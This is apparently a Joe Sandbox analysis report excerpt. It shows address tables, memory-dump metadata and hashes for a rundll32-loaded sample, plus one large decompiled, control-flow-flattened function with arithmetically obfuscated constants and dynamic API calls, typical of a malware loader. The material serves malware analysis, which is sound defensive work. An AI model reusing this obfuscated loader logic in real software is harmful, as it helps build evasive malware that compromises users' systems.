                                                                                                                      0x0017a339
                                                                                                                      0x0017a344
                                                                                                                      0x0017a34f
                                                                                                                      0x0017a35a
                                                                                                                      0x0017a362
                                                                                                                      0x0017a36f
                                                                                                                      0x0017a378
                                                                                                                      0x0017a37c
                                                                                                                      0x0017a384
                                                                                                                      0x0017a38f
                                                                                                                      0x0017a39a
                                                                                                                      0x0017a3a5
                                                                                                                      0x0017a3b0
                                                                                                                      0x0017a3b8
                                                                                                                      0x0017a3c3
                                                                                                                      0x0017a3cd
                                                                                                                      0x0017a3d5
                                                                                                                      0x0017a3e5
                                                                                                                      0x0017a3ed
                                                                                                                      0x0017a3f5
                                                                                                                      0x0017a3fd
                                                                                                                      0x0017a405
                                                                                                                      0x0017a40d
                                                                                                                      0x0017a41c
                                                                                                                      0x0017a41d
                                                                                                                      0x0017a426
                                                                                                                      0x0017a42a
                                                                                                                      0x0017a432
                                                                                                                      0x0017a43d
                                                                                                                      0x0017a448
                                                                                                                      0x0017a450
                                                                                                                      0x0017a45b
                                                                                                                      0x0017a463
                                                                                                                      0x0017a468
                                                                                                                      0x0017a470
                                                                                                                      0x0017a478
                                                                                                                      0x0017a480
                                                                                                                      0x0017a488
                                                                                                                      0x0017a490
                                                                                                                      0x0017a495
                                                                                                                      0x0017a49d
                                                                                                                      0x0017a4a5
                                                                                                                      0x0017a4b0
                                                                                                                      0x0017a4bb
                                                                                                                      0x0017a4c6
                                                                                                                      0x0017a4da
                                                                                                                      0x0017a4e1
                                                                                                                      0x0017a4ec
                                                                                                                      0x0017a4f7
                                                                                                                      0x0017a502
                                                                                                                      0x0017a50d
                                                                                                                      0x0017a518
                                                                                                                      0x0017a520
                                                                                                                      0x0017a52d
                                                                                                                      0x0017a531
                                                                                                                      0x0017a539
                                                                                                                      0x0017a541
                                                                                                                      0x0017a54e
                                                                                                                      0x0017a552
                                                                                                                      0x0017a557
                                                                                                                      0x0017a55f
                                                                                                                      0x0017a567
                                                                                                                      0x0017a572
                                                                                                                      0x0017a582
                                                                                                                      0x0017a589
                                                                                                                      0x0017a594
                                                                                                                      0x0017a59c
                                                                                                                      0x0017a5a4
                                                                                                                      0x0017a5ac
                                                                                                                      0x0017a5b4
                                                                                                                      0x0017a5bc
                                                                                                                      0x0017a5c7
                                                                                                                      0x0017a5cf
                                                                                                                      0x0017a5da
                                                                                                                      0x0017a5e2
                                                                                                                      0x0017a5ef
                                                                                                                      0x0017a5f3
                                                                                                                      0x0017a5fb
                                                                                                                      0x0017a603
                                                                                                                      0x0017a60e
                                                                                                                      0x0017a619
                                                                                                                      0x0017a624
                                                                                                                      0x0017a62f
                                                                                                                      0x0017a642
                                                                                                                      0x0017a647
                                                                                                                      0x0017a652
                                                                                                                      0x0017a659
                                                                                                                      0x0017a66c
                                                                                                                      0x0017a673
                                                                                                                      0x0017a67e
                                                                                                                      0x0017a689
                                                                                                                      0x0017a694
                                                                                                                      0x0017a69f
                                                                                                                      0x0017a69f
                                                                                                                      0x0017a6a4
                                                                                                                      0x0017a6a4
                                                                                                                      0x0017a6a4
                                                                                                                      0x0017a6a9
                                                                                                                      0x0017a6ae
                                                                                                                      0x0017a6ae
                                                                                                                      0x0017a6ae
                                                                                                                      0x0017a6ae
                                                                                                                      0x0017a6b4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017a6ba
                                                                                                                      0x0017a86a
                                                                                                                      0x0017a86e
                                                                                                                      0x0017a880
                                                                                                                      0x0017a885
                                                                                                                      0x0017a88f
                                                                                                                      0x0017a896
                                                                                                                      0x0017a8a8
                                                                                                                      0x0017a8f1
                                                                                                                      0x0017a904
                                                                                                                      0x0017a90b
                                                                                                                      0x0017a923
                                                                                                                      0x0017a928
                                                                                                                      0x0017a92f
                                                                                                                      0x00000000
                                                                                                                      0x0017a6c0
                                                                                                                      0x0017a6c2
                                                                                                                      0x0017a81e
                                                                                                                      0x0017a848
                                                                                                                      0x0017a84f
                                                                                                                      0x0017a85b
                                                                                                                      0x0017a85d
                                                                                                                      0x0017a862
                                                                                                                      0x00000000
                                                                                                                      0x0017a6c8
                                                                                                                      0x0017a6ce
                                                                                                                      0x0017ab52
                                                                                                                      0x0017a6d4
                                                                                                                      0x0017a6d6
                                                                                                                      0x0017a806
                                                                                                                      0x0017a808
                                                                                                                      0x0017a69f
                                                                                                                      0x0017a69f
                                                                                                                      0x00000000
                                                                                                                      0x0017a69f
                                                                                                                      0x0017a6dc
                                                                                                                      0x0017a6e2
                                                                                                                      0x0017a7ce

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *2c$,$0L4$Api$G=$$H$R\$TKW$a=$n:p$pZy$zR-$4r
                                                                                                                      • API String ID: 0-1682715903
                                                                                                                      • Opcode ID: 75d63c1f6f4a5fd936b512efa252a5b86b08995d8d7489780f9c382ba2d8f165
                                                                                                                      • Instruction ID: 30a8be9d9eea25dfcfdf0d8c0be8cdd0b146032078faeb34fa2f31eeb0e6299d
                                                                                                                      • Opcode Fuzzy Hash: 75d63c1f6f4a5fd936b512efa252a5b86b08995d8d7489780f9c382ba2d8f165
                                                                                                                      • Instruction Fuzzy Hash: 0182ED715083818BD379CF65C58AA8FBBF2BBC4308F50891DE6CA96260D7B58949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00186864(char __ecx, signed int __edx) {
                                                                                                                      				char _v128;
                                                                                                                      				char _v256;
                                                                                                                      				char _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				intOrPtr _v296;
                                                                                                                      				intOrPtr _v300;
                                                                                                                      				intOrPtr _v304;
                                                                                                                      				intOrPtr _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				unsigned int _v380;
                                                                                                                      				unsigned int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				signed int _v432;
                                                                                                                      				signed int _v436;
                                                                                                                      				signed int _v440;
                                                                                                                      				signed int _v444;
                                                                                                                      				signed int _v448;
                                                                                                                      				signed int _v452;
                                                                                                                      				signed int _v456;
                                                                                                                      				signed int _v460;
                                                                                                                      				signed int _v464;
                                                                                                                      				unsigned int _v468;
                                                                                                                      				signed int _v472;
                                                                                                                      				signed int _v476;
                                                                                                                      				signed int _v480;
                                                                                                                      				signed int _v484;
                                                                                                                      				char _v488;
                                                                                                                      				signed int _v492;
                                                                                                                      				signed int _v496;
                                                                                                                      				signed int _v500;
                                                                                                                      				signed int _v504;
                                                                                                                      				signed int _v508;
                                                                                                                      				signed int _v512;
                                                                                                                      				unsigned int _v516;
                                                                                                                      				signed int _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _t574;
                                                                                                                      				signed int _t578;
                                                                                                                      				signed int _t583;
                                                                                                                      				void* _t604;
                                                                                                                      				void* _t614;
                                                                                                                      				signed int _t616;
                                                                                                                      				int _t621;
                                                                                                                      				signed int _t623;
                                                                                                                      				signed int _t624;
                                                                                                                      				signed int _t628;
                                                                                                                      				intOrPtr* _t633;
                                                                                                                      				void* _t636;
                                                                                                                      				void* _t637;
                                                                                                                      				void* _t638;
                                                                                                                      				signed int _t654;
                                                                                                                      				void* _t686;
                                                                                                                      				void* _t687;
                                                                                                                      				signed int _t689;
                                                                                                                      				signed int _t703;
                                                                                                                      				signed int _t704;
                                                                                                                      				signed int _t705;
                                                                                                                      				signed int _t706;
                                                                                                                      				signed int _t707;
                                                                                                                      				signed int _t708;
                                                                                                                      				signed int _t709;
                                                                                                                      				signed int _t710;
                                                                                                                      				signed int _t711;
                                                                                                                      				signed int _t712;
                                                                                                                      				signed int _t713;
                                                                                                                      				signed int _t714;
                                                                                                                      				signed int _t715;
                                                                                                                      				void* _t719;
                                                                                                                      				void* _t722;
                                                                                                                      				void* _t723;
                                                                                                                      				void* _t724;
                                                                                                                      				signed int _t729;
                                                                                                                      				signed int* _t730;
                                                                                                                      				void* _t736;
                                                                                                                      
                                                                                                                      				_t730 =  &_v536;
                                                                                                                      				_v312 = __edx;
                                                                                                                      				_v488 = __ecx;
                                                                                                                      				_v292 = _v292 & 0x00000000;
                                                                                                                      				_v304 = 0xafedb;
                                                                                                                      				_v300 = 0x161b15;
                                                                                                                      				_v296 = 0xc4991c;
                                                                                                                      				_v520 = 0x229c01;
                                                                                                                      				_v520 = _v520 * 0x5c;
                                                                                                                      				_t723 = 0xff9e75d;
                                                                                                                      				_v520 = _v520 + 0xffff9f66;
                                                                                                                      				_t703 = 0xc;
                                                                                                                      				_v520 = _v520 / _t703;
                                                                                                                      				_v520 = _v520 ^ 0x01094ea5;
                                                                                                                      				_v532 = 0xceed0e;
                                                                                                                      				_v532 = _v532 << 3;
                                                                                                                      				_v532 = _v532 | 0xe74d27fb;
                                                                                                                      				_v532 = _v532 ^ 0xe772d72f;
                                                                                                                      				_v476 = 0xc446fa;
                                                                                                                      				_v476 = _v476 + 0xf6e0;
                                                                                                                      				_v476 = _v476 + 0x4782;
                                                                                                                      				_v476 = _v476 + 0xffffecbc;
                                                                                                                      				_v476 = _v476 ^ 0x00cc0886;
                                                                                                                      				_v336 = 0x190970;
                                                                                                                      				_t704 = 0x2e;
                                                                                                                      				_v336 = _v336 * 0x68;
                                                                                                                      				_v336 = _v336 ^ 0x0a2923c5;
                                                                                                                      				_v328 = 0x78e0eb;
                                                                                                                      				_v328 = _v328 + 0x488f;
                                                                                                                      				_v328 = _v328 ^ 0x00799c70;
                                                                                                                      				_v344 = 0x81e0f6;
                                                                                                                      				_v344 = _v344 << 5;
                                                                                                                      				_v344 = _v344 ^ 0x103feee2;
                                                                                                                      				_v468 = 0xdaa1d;
                                                                                                                      				_v468 = _v468 * 0x7d;
                                                                                                                      				_v468 = _v468 + 0xfffff9ad;
                                                                                                                      				_v468 = _v468 >> 0xb;
                                                                                                                      				_v468 = _v468 ^ 0x0000a0f1;
                                                                                                                      				_v500 = 0x314529;
                                                                                                                      				_t62 =  &_v500; // 0x314529
                                                                                                                      				_v500 =  *_t62 * 0x2f;
                                                                                                                      				_t64 =  &_v500; // 0x314529
                                                                                                                      				_v500 =  *_t64 * 0x58;
                                                                                                                      				_v500 = _v500 ^ 0x606cc451;
                                                                                                                      				_v500 = _v500 ^ 0x7c6b32c1;
                                                                                                                      				_v452 = 0xb84a45;
                                                                                                                      				_v452 = _v452 + 0x7128;
                                                                                                                      				_t705 = 0x77;
                                                                                                                      				_v452 = _v452 / _t704;
                                                                                                                      				_v452 = _v452 ^ 0x000855d5;
                                                                                                                      				_v320 = 0x670f1a;
                                                                                                                      				_v320 = _v320 + 0xc1b0;
                                                                                                                      				_v320 = _v320 ^ 0x00622c3e;
                                                                                                                      				_v528 = 0x36f841;
                                                                                                                      				_v528 = _v528 | 0xd9d6132d;
                                                                                                                      				_v528 = _v528 + 0xffff776d;
                                                                                                                      				_v528 = _v528 << 0xd;
                                                                                                                      				_v528 = _v528 ^ 0xce5fe5c5;
                                                                                                                      				_v444 = 0x9c7682;
                                                                                                                      				_v444 = _v444 ^ 0x90589f65;
                                                                                                                      				_v444 = _v444 * 0x27;
                                                                                                                      				_v444 = _v444 ^ 0x0df55b42;
                                                                                                                      				_v512 = 0x104d73;
                                                                                                                      				_v512 = _v512 / _t705;
                                                                                                                      				_v512 = _v512 ^ 0x3e9257a1;
                                                                                                                      				_v512 = _v512 | 0xb9bbbc7d;
                                                                                                                      				_v512 = _v512 ^ 0xbfb4ec53;
                                                                                                                      				_v428 = 0xbc5642;
                                                                                                                      				_v428 = _v428 ^ 0xe7847a8c;
                                                                                                                      				_t706 = 0x55;
                                                                                                                      				_v428 = _v428 * 0x7f;
                                                                                                                      				_v428 = _v428 ^ 0xb4dd412b;
                                                                                                                      				_v436 = 0x8f794f;
                                                                                                                      				_v436 = _v436 << 9;
                                                                                                                      				_v436 = _v436 / _t706;
                                                                                                                      				_v436 = _v436 ^ 0x00567a69;
                                                                                                                      				_v496 = 0x46853b;
                                                                                                                      				_v496 = _v496 + 0xffff90ed;
                                                                                                                      				_v496 = _v496 >> 5;
                                                                                                                      				_t707 = 0x67;
                                                                                                                      				_v496 = _v496 / _t707;
                                                                                                                      				_v496 = _v496 ^ 0x000cc5d9;
                                                                                                                      				_v372 = 0xd1254b;
                                                                                                                      				_v372 = _v372 << 7;
                                                                                                                      				_v372 = _v372 ^ 0x689f86f2;
                                                                                                                      				_v504 = 0x5d1a6;
                                                                                                                      				_v504 = _v504 + 0xffffc3f1;
                                                                                                                      				_v504 = _v504 ^ 0x7853fb4b;
                                                                                                                      				_v504 = _v504 | 0x0811a454;
                                                                                                                      				_v504 = _v504 ^ 0x78557827;
                                                                                                                      				_v376 = 0x40c0d3;
                                                                                                                      				_v376 = _v376 + 0xba7b;
                                                                                                                      				_v376 = _v376 ^ 0x0043f819;
                                                                                                                      				_v448 = 0x188995;
                                                                                                                      				_v448 = _v448 ^ 0x19c6d723;
                                                                                                                      				_v448 = _v448 + 0xffff6508;
                                                                                                                      				_v448 = _v448 ^ 0x19d0df3a;
                                                                                                                      				_v368 = 0xa08e58;
                                                                                                                      				_v368 = _v368 | 0xc4b17aa1;
                                                                                                                      				_v368 = _v368 ^ 0xc4b81ac3;
                                                                                                                      				_v492 = 0x5a5e24;
                                                                                                                      				_v492 = _v492 ^ 0x14ae01a0;
                                                                                                                      				_v492 = _v492 + 0xffffeac5;
                                                                                                                      				_v492 = _v492 + 0xffff378f;
                                                                                                                      				_v492 = _v492 ^ 0x14f310c0;
                                                                                                                      				_v460 = 0x25665c;
                                                                                                                      				_v460 = _v460 << 9;
                                                                                                                      				_v460 = _v460 + 0xb06;
                                                                                                                      				_v460 = _v460 + 0x6999;
                                                                                                                      				_v460 = _v460 ^ 0x4ac4129f;
                                                                                                                      				_v316 = 0x9c2147;
                                                                                                                      				_v316 = _v316 | 0xf1f8cc6e;
                                                                                                                      				_v316 = _v316 ^ 0xf1f4b434;
                                                                                                                      				_v524 = 0x2e48d0;
                                                                                                                      				_v524 = _v524 + 0xffff862d;
                                                                                                                      				_v524 = _v524 + 0x29e8;
                                                                                                                      				_v524 = _v524 * 0x4b;
                                                                                                                      				_v524 = _v524 ^ 0x0d7cea3a;
                                                                                                                      				_v384 = 0x8701af;
                                                                                                                      				_v384 = _v384 + 0xf5cc;
                                                                                                                      				_v384 = _v384 >> 7;
                                                                                                                      				_v384 = _v384 ^ 0x000bfa6c;
                                                                                                                      				_v484 = 0x89e0a0;
                                                                                                                      				_v484 = _v484 >> 6;
                                                                                                                      				_v484 = _v484 << 0xd;
                                                                                                                      				_v484 = _v484 | 0xc3b3473c;
                                                                                                                      				_v484 = _v484 ^ 0xc7fe9c77;
                                                                                                                      				_v516 = 0xee0a8f;
                                                                                                                      				_v516 = _v516 ^ 0x55897709;
                                                                                                                      				_v516 = _v516 | 0x2d6779b6;
                                                                                                                      				_v516 = _v516 >> 0xc;
                                                                                                                      				_v516 = _v516 ^ 0x0009a0b5;
                                                                                                                      				_v408 = 0x69ddc;
                                                                                                                      				_v408 = _v408 + 0xffff558a;
                                                                                                                      				_v408 = _v408 | 0x7b9a8e55;
                                                                                                                      				_v408 = _v408 ^ 0x7b9d6bde;
                                                                                                                      				_v440 = 0x3ec00a;
                                                                                                                      				_t708 = 7;
                                                                                                                      				_v440 = _v440 * 0x6d;
                                                                                                                      				_v440 = _v440 ^ 0x82501226;
                                                                                                                      				_v440 = _v440 ^ 0x98e12210;
                                                                                                                      				_v360 = 0xa9836;
                                                                                                                      				_t709 = 0x66;
                                                                                                                      				_v360 = _v360 / _t708;
                                                                                                                      				_v360 = _v360 ^ 0x000ed550;
                                                                                                                      				_v508 = 0xae1f70;
                                                                                                                      				_v508 = _v508 / _t709;
                                                                                                                      				_v508 = _v508 | 0xf9ffdfbb;
                                                                                                                      				_v508 = _v508 ^ 0xf9f8fc25;
                                                                                                                      				_v324 = 0xeedbe0;
                                                                                                                      				_v324 = _v324 + 0xffffa9bd;
                                                                                                                      				_v324 = _v324 ^ 0x00e20b5f;
                                                                                                                      				_v392 = 0x6a2c5c;
                                                                                                                      				_v392 = _v392 | 0xb7dff57a;
                                                                                                                      				_v392 = _v392 << 0xb;
                                                                                                                      				_v392 = _v392 ^ 0xffee34eb;
                                                                                                                      				_v432 = 0x407729;
                                                                                                                      				_v432 = _v432 + 0xb79f;
                                                                                                                      				_v432 = _v432 | 0x8bf66f7a;
                                                                                                                      				_v432 = _v432 ^ 0x8bfc9481;
                                                                                                                      				_v424 = 0x63ea97;
                                                                                                                      				_v424 = _v424 >> 0x10;
                                                                                                                      				_v424 = _v424 + 0xffffc4e0;
                                                                                                                      				_v424 = _v424 ^ 0xfffae0f6;
                                                                                                                      				_v332 = 0x7c55b7;
                                                                                                                      				_t710 = 0x1b;
                                                                                                                      				_v332 = _v332 / _t710;
                                                                                                                      				_v332 = _v332 ^ 0x0008067b;
                                                                                                                      				_v352 = 0x1d2ffa;
                                                                                                                      				_t711 = 0x70;
                                                                                                                      				_v352 = _v352 * 0x3b;
                                                                                                                      				_v352 = _v352 ^ 0x06b3fb37;
                                                                                                                      				_v416 = 0x356707;
                                                                                                                      				_t712 = 0x4d;
                                                                                                                      				_v416 = _v416 / _t711;
                                                                                                                      				_v416 = _v416 * 0xf;
                                                                                                                      				_v416 = _v416 ^ 0x000a8be6;
                                                                                                                      				_v400 = 0x975723;
                                                                                                                      				_v400 = _v400 | 0x269443d2;
                                                                                                                      				_v400 = _v400 << 9;
                                                                                                                      				_v400 = _v400 ^ 0x2eac99c7;
                                                                                                                      				_v396 = 0x86389d;
                                                                                                                      				_v396 = _v396 ^ 0xdd3767b8;
                                                                                                                      				_t713 = 0x6d;
                                                                                                                      				_v396 = _v396 / _t712;
                                                                                                                      				_v396 = _v396 ^ 0x02eba2ca;
                                                                                                                      				_v404 = 0xdbbdba;
                                                                                                                      				_v404 = _v404 << 9;
                                                                                                                      				_v404 = _v404 / _t713;
                                                                                                                      				_v404 = _v404 ^ 0x01a57735;
                                                                                                                      				_v356 = 0xfabb05;
                                                                                                                      				_v356 = _v356 | 0x8af6c05e;
                                                                                                                      				_v356 = _v356 ^ 0x8af1d93b;
                                                                                                                      				_v380 = 0x2efe0b;
                                                                                                                      				_v380 = _v380 | 0x60ccafe9;
                                                                                                                      				_v380 = _v380 >> 2;
                                                                                                                      				_v380 = _v380 ^ 0x183e3099;
                                                                                                                      				_v348 = 0x4aabda;
                                                                                                                      				_v348 = _v348 ^ 0x6d9ddbef;
                                                                                                                      				_v348 = _v348 ^ 0x6dd36298;
                                                                                                                      				_v388 = 0x49b388;
                                                                                                                      				_v388 = _v388 | 0xfd8f470c;
                                                                                                                      				_v388 = _v388 << 0xa;
                                                                                                                      				_v388 = _v388 ^ 0x3fdfba02;
                                                                                                                      				_v472 = 0xbd7846;
                                                                                                                      				_v472 = _v472 + 0xffff85c8;
                                                                                                                      				_v472 = _v472 >> 0xd;
                                                                                                                      				_v472 = _v472 >> 0xc;
                                                                                                                      				_v472 = _v472 ^ 0x00060807;
                                                                                                                      				_v456 = 0xd92e51;
                                                                                                                      				_t714 = 0x17;
                                                                                                                      				_v456 = _v456 / _t714;
                                                                                                                      				_v456 = _v456 >> 0xd;
                                                                                                                      				_v456 = _v456 + 0xffff8d85;
                                                                                                                      				_v456 = _v456 ^ 0xfffee4a4;
                                                                                                                      				_v340 = 0x27bb27;
                                                                                                                      				_v340 = _v340 | 0xb25f39d4;
                                                                                                                      				_v340 = _v340 ^ 0xb27a85e4;
                                                                                                                      				_v464 = 0x5d8dc9;
                                                                                                                      				_v464 = _v464 + 0x522d;
                                                                                                                      				_v464 = _v464 << 1;
                                                                                                                      				_t623 = 0xb;
                                                                                                                      				_v464 = _v464 / _t623;
                                                                                                                      				_v464 = _v464 ^ 0x0017bd02;
                                                                                                                      				_v364 = 0xb86d20;
                                                                                                                      				_v364 = _v364 + 0x9843;
                                                                                                                      				_v364 = _v364 ^ 0x00bb00fc;
                                                                                                                      				_v480 = 0x632eda;
                                                                                                                      				_v480 = _v480 + 0xffff6eee;
                                                                                                                      				_v480 = _v480 + 0xffff8324;
                                                                                                                      				_v480 = _v480 + 0x3513;
                                                                                                                      				_v480 = _v480 ^ 0x006160eb;
                                                                                                                      				_v412 = 0xc84084;
                                                                                                                      				_t715 = 0x19;
                                                                                                                      				_t729 = _v312;
                                                                                                                      				_t624 = _v312;
                                                                                                                      				_v412 = _v412 / _t715;
                                                                                                                      				_v412 = _v412 | 0x26b33a0b;
                                                                                                                      				_v412 = _v412 ^ 0x26bcb4da;
                                                                                                                      				_v420 = 0x8ac001;
                                                                                                                      				_v420 = _v420 << 0xf;
                                                                                                                      				_v420 = _v420 ^ 0xe10d88e3;
                                                                                                                      				_v420 = _v420 ^ 0x810a258e;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						_t686 = 0x14e2fae;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								L3:
                                                                                                                      								_t736 = _t723 - 0x6872271;
                                                                                                                      								if(_t736 <= 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0x6af60a9;
                                                                                                                      								if(_t723 == 0x6af60a9) {
                                                                                                                      									_push(0x4000);
                                                                                                                      									_push(0x4000);
                                                                                                                      									_t574 = E00183512(0x4000);
                                                                                                                      									_v536 = _t574;
                                                                                                                      									__eflags = _t574;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										_t633 = _v488;
                                                                                                                      										_t723 = 0x3b379fe;
                                                                                                                      										_t686 = 0x14e2fae;
                                                                                                                      										goto L31;
                                                                                                                      									}
                                                                                                                      									_t723 = 0x2b997a9;
                                                                                                                      									L13:
                                                                                                                      									_t633 = _v488;
                                                                                                                      									_t686 = 0x14e2fae;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0x6fc00ac;
                                                                                                                      								if(_t723 == 0x6fc00ac) {
                                                                                                                      									_t724 =  &_v256;
                                                                                                                      									_t687 = E0017EF71(8, 0x10);
                                                                                                                      									_t578 = _v520;
                                                                                                                      									__eflags = _t578 - _t687;
                                                                                                                      									if(_t578 < _t687) {
                                                                                                                      										_t689 = _t687 - _t578;
                                                                                                                      										_t719 = _t724;
                                                                                                                      										_t654 = _t689 >> 1;
                                                                                                                      										__eflags = _t654;
                                                                                                                      										_t621 = memset(_t719, 0x2d002d, _t654 << 2);
                                                                                                                      										asm("adc ecx, ecx");
                                                                                                                      										_t724 = _t724 + _t689 * 2;
                                                                                                                      										memset(_t719 + _t654, _t621, 0);
                                                                                                                      										_t730 =  &(_t730[6]);
                                                                                                                      									}
                                                                                                                      									_push(E0017EF71(8, 0x10));
                                                                                                                      									_push(_v436);
                                                                                                                      									_push(_t724);
                                                                                                                      									_t636 = 0xb;
                                                                                                                      									E00175A07(_t636, _v428);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0x6af60a9;
                                                                                                                      									L12:
                                                                                                                      									_t583 = _v536;
                                                                                                                      									goto L13;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xa6d69a8;
                                                                                                                      								if(_t723 == 0xa6d69a8) {
                                                                                                                      									_t722 = E0017EF71(1, 8);
                                                                                                                      									_push(_t722);
                                                                                                                      									_push(_v328);
                                                                                                                      									_push( &_v288);
                                                                                                                      									_t637 = 9;
                                                                                                                      									E00175A07(_t637, _v336);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0xb1820f0;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xb1820f0;
                                                                                                                      								if(_t723 == 0xb1820f0) {
                                                                                                                      									_t722 = E0017EF71(4, 0x10);
                                                                                                                      									_push(_t722);
                                                                                                                      									_push(_v452);
                                                                                                                      									_push( &_v128);
                                                                                                                      									_t638 = 0xb;
                                                                                                                      									E00175A07(_t638, _v500);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0x6fc00ac;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xff9e75d;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									goto L31;
                                                                                                                      								}
                                                                                                                      								_t723 = 0xa6d69a8;
                                                                                                                      							}
                                                                                                                      							if(_t736 == 0) {
                                                                                                                      								E0018FD29( *_t633, _v416, _t624, _v400,  *((intOrPtr*)(_t633 + 4)));
                                                                                                                      								_t488 =  &_v488; // 0x6160eb
                                                                                                                      								_t633 =  *_t488;
                                                                                                                      								_t730 =  &(_t730[3]);
                                                                                                                      								_t723 = 0x605d68b;
                                                                                                                      								_t624 = _t624 +  *((intOrPtr*)(_t633 + 4));
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							if(_t723 == _t686) {
                                                                                                                      								_push(0x17141c);
                                                                                                                      								_push(_v360);
                                                                                                                      								_v308 = _t722 + _t729;
                                                                                                                      								_t624 = E0017F545( &_v128, __eflags, _v508, _t722 + _t729 - _t729,  &_v256, _v324,  &_v288, _v392, E0017BB4B(_v408, _v440, __eflags), _v432) + _t729;
                                                                                                                      								E0017AE03(_v424, _v332, _v352, _t595);
                                                                                                                      								_t730 =  &(_t730[0xc]);
                                                                                                                      								_t723 = 0x6872271;
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x2109cc3) {
                                                                                                                      								_t722 = _t722 +  *((intOrPtr*)(_t633 + 4));
                                                                                                                      								_push(_t633);
                                                                                                                      								_push(_t633);
                                                                                                                      								_t729 = E00183512(_t722);
                                                                                                                      								_t583 = _v536;
                                                                                                                      								__eflags = _t729;
                                                                                                                      								_t633 = _v488;
                                                                                                                      								_t686 = 0x14e2fae;
                                                                                                                      								_t723 =  !=  ? 0x14e2fae : 0x6704547;
                                                                                                                      								goto L3;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x2b997a9) {
                                                                                                                      								_push(_v492);
                                                                                                                      								_push(_v368);
                                                                                                                      								_push(0x1713bc);
                                                                                                                      								_t604 = E0017AB66(_v376, _v448, __eflags);
                                                                                                                      								_push( &_v256);
                                                                                                                      								_push(_t604);
                                                                                                                      								_push(_t722);
                                                                                                                      								_push(_v536);
                                                                                                                      								 *((intOrPtr*)(E0017C1DC(_v376, 0xbf7d08b0, 0xef)))();
                                                                                                                      								E0017AE03(_v460, _v316, _v524, _t604);
                                                                                                                      								_t730 =  &(_t730[9]);
                                                                                                                      								_t723 = 0x2109cc3;
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x605d68b) {
                                                                                                                      								_push(0x17138c);
                                                                                                                      								_push(_v356);
                                                                                                                      								_t614 = E0017F060(E0017BB4B(_v396, _v404, __eflags), __eflags, _v348, _t624, _v308 - _t624, _v388,  &_v256, _v472);
                                                                                                                      								E0017AE03(_v456, _v340, _v464, _t610);
                                                                                                                      								_t616 = _v312;
                                                                                                                      								_t628 = _t624 + _t614 - _t729;
                                                                                                                      								__eflags = _t628;
                                                                                                                      								 *_t616 = _t729;
                                                                                                                      								 *(_t616 + 4) = _t628;
                                                                                                                      								L34:
                                                                                                                      								return _v536;
                                                                                                                      							}
                                                                                                                      							if(_t723 != 0x6704547) {
                                                                                                                      								goto L31;
                                                                                                                      							}
                                                                                                                      							E001768DE(_v364, _v480, _v412, _v420, _t583);
                                                                                                                      							return 0;
                                                                                                                      							L31:
                                                                                                                      							__eflags = _t723 - 0x3b379fe;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L34;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00186ab2
                                                                                                                      0x00186ab9
                                                                                                                      0x00186ac4
                                                                                                                      0x00186acc
                                                                                                                      0x00186ad9
                                                                                                                      0x00186add
                                                                                                                      0x00186ae5
                                                                                                                      0x00186aed
                                                                                                                      0x00186af5
                                                                                                                      0x00186afe
                                                                                                                      0x00186b01
                                                                                                                      0x00186b05
                                                                                                                      0x00186b0d
                                                                                                                      0x00186b18
                                                                                                                      0x00186b20
                                                                                                                      0x00186b2b
                                                                                                                      0x00186b33
                                                                                                                      0x00186b3b
